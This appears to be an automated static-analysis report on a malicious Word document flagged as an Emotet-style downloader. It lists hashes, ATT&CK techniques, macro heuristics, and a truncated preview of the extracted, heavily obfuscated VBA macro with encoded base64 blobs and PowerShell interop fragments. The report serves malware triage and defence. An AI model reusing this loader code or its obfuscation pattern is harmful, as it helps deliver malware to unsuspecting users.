Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0560ef2be5dffddc…

MALICIOUS

Office (OLE)

163.0 KB Created: 2018-03-21 20:43:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 74bf14cbe2e492a4c5c8ab9e345ce258 SHA-1: a83d1058289ac7d82e31f91f44a5395c281e66e8 SHA-256: 0560ef2be5dffddcae1d93e66a9011a2e2c3b85c565a2c86cb627d36eceebfcf
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Microsoft Word document containing VBA macros, specifically an AutoOpen macro. Heuristics indicate the use of CreateObject, suggesting the execution of code to download and run a secondary payload. The ClamAV detection name 'Doc.Malware.Emodldr-10025032-0' further confirms its malicious nature. The VBA script itself appears heavily obfuscated, making it difficult to determine the exact download URL or execution method, but its intent is clearly to fetch and run additional malware.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45942 bytes
SHA-256: bd0bde099eff6ac10043c2a3043de22a5fca4b6a913ad6951ff7d09344a89c6d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 17 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DQbMPFECqBoz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "shETlKIlk"
Function ktRwtKA()
On Error Resume Next
Select Case jIBwSY
         Case 5936
            wEsOlC = Hex(1562 - CSng(4035) - 67630 + ChrW(hSqOS))
            BPEra = RntaHD
End Select
FLjpGWZN = tzUDv("8oEAYgBhAGMANwBjAGEAYgmuUwz", 3, 20)
Select Case GHQHSC
         Case 14044
            dWEzhc = Hex(76964 - CSng(25950) - 18571 + ChrW(VppvCU))
            HFmEV = vzTcG
End Select
Select Case japvbi
         Case 92715
            KGXoz = Hex(37176 - CSng(77502) - 68745 + ChrW(ckwuni))
            bdcjX = Czshz
End Select
nzXpljOJ = tzUDv("YKoWmOkAGIAYgBkAGYANgBhADUAZAA0ADcAZAAyADYAMwA3ADQAYwA4ADYAYwAwAGYANwAwADcANQAwADgAOAA4ADYAMQA3ADgAOABlAGQAMgA3ADAAYQAxADEAYwBjAGYANQA1AGEAYgA3ADkAZQA4ADUAZgBlADMAYQAyADIAYgo,", 7, 167)
Select Case bFskRG
         Case 61894
            ttrXqj = Hex(30089 - CSng(587) - 2377 + ChrW(hwriUw))
            MkwDX = SUoIak
End Select
Select Case kkakZw
         Case 30687
            lVIBZ = Hex(66557 - CSng(39232) - 49244 + ChrW(LfCCv))
            cqPbQL = NtpLi
End Select
ESHGbfu = tzUDv("wceS.mArSHAL].gEtmEMberS()[4].NaME).InvOKe( [RuNTIme.iNterOpservuJJXdmf9", 2, 63)
Select Case snCuUD
         Case 31173
            JHMOw = Hex(63357 - CSng(93210) - 15317 + ChrW(wcoFwu))
            UzviI = LOAbh
End Select
Select Case jpOhm
         Case 34570
            rHKhdR = Hex(13218 - CSng(61655) - 24628 + ChrW(jvAmMA))
            ZAIil = wRobXz
End Select
kjsbEqLw = tzUDv("zj5KF16050a5345MgB8AEsASQBUAGYAeQBwAHYAQwA3ADYAWgBWAEoATgBaAG0AegBjAGUAVAB1AFEAPQA9AHwAMAAxAGQAOQAxAGIAYwAzAGMAk2", 6, 106)
Select Case Cdtaz
         Case 81108
            qJnsRS = Hex(11104 - CSng(44333) - 99802 + ChrW(SXpGIl))
            FGUNP = qjjnfF
End Select
Select Case cCTqjF
         Case 66674
            coPaOJ = Hex(79000 - CSng(7669) - 59673 + ChrW(kAkAvI))
            IwjfiZ = jnsit
End Select
HlHoLXsKT = tzUDv("v5BkADMAOQAwADEAOQA5AaskOz", 3, 19)
Select Case YpRFMI
         Case 93
            RiREpG = Hex(88621 - CSng(97997) - 97610 + ChrW(HKEYGC))
            wOMrb = GKCau
End Select
Select Case zbXEz
         Case 71786
            DLiTHF = Hex(77982 - CSng(93086) - 78333 + ChrW(bhiff))
            vGIsmR = ZtEHNs
End Select
ArRisTYwZHM = tzUDv("Xu4ADgAZABlADQA5EIWZ4", 3, 13)
Select Case Vtjhz
         Case 90778
            OuhVX = Hex(62205 - CSng(18143) - 58473 + ChrW(rnRrbz))
            svmiFZ = zaEhv
End Select
Select Case YQPVkm
         Case 73243
            EKwJJ = Hex(4323 - CSng(12538) - 31922 + ChrW(zqQvZ))
            InCQZs = PKKnRN
End Select
DwCQScU = tzUDv("r3A2ADkAYwBjAGMAYQBlADkANQAwADcAMQBmADIANAA5ADIjGZJ", 3, 45)
Select Case iQktk
         Case 21480
            biiSk = Hex(23497 - CSng(61181) - 78593 + ChrW(jwwiG))
            iVMdTv = wVktBh
End Select
Select Case sJJdz
         Case 2243
            iPcQS = Hex(20455 - CSng(33352) - 45119 + ChrW(MMhIIF))
            bHDzI = iwKIiw
End Select
Lqszw = tzUDv("wwBlAGMAMgA5ADIAOQAzADYAMAAwADcANAA3ADUAZAA1ADcAMQBkADUAMgBkADcAZQA3AGYAOQAzADQAYQAyADQANgBjADIANQBhADAAMwAyADIAMwBmAGMAMgA5ADYANwAyAGUAMwA1AQ@WiAJG", 3, 139)
Select Case ttFqIY
         Case 4057
            FoHXr = Hex(40104 - CSng(42983) - 7508 + ChrW(PLnjh))
            tBDIj = GJjTrq
End Select
Select Case zdrZQA
         Case 41802
            PTMAK = Hex(2863 - CSng(29939) - 24642 + ChrW(EzIBJV))
            CUnPb = TcLkA
End Select
IpdovZbWv = tzUDv("Ih6gAxADAANAA5ADIAZgAwAGYAZQA2ADAANAA1AGYAZgAyADIAYgA3ADQANQA5AGUAYgA1AGUANAA1AGEAOAA2AGUAZAA0AGIAOQA4ADUAYQA1ADMAYgBhADUANwAyAGQAOABjADcANwA0ADAANwBmADQAMABmADYANQBUN4", 4, 162)
Select Case WifiYi
         Case 73865
            HhBWXI = Hex(53860 - CSng(26716) - 52567 + ChrW(znHkXw))
            GlNzk = ZBcqMY
E
... (truncated)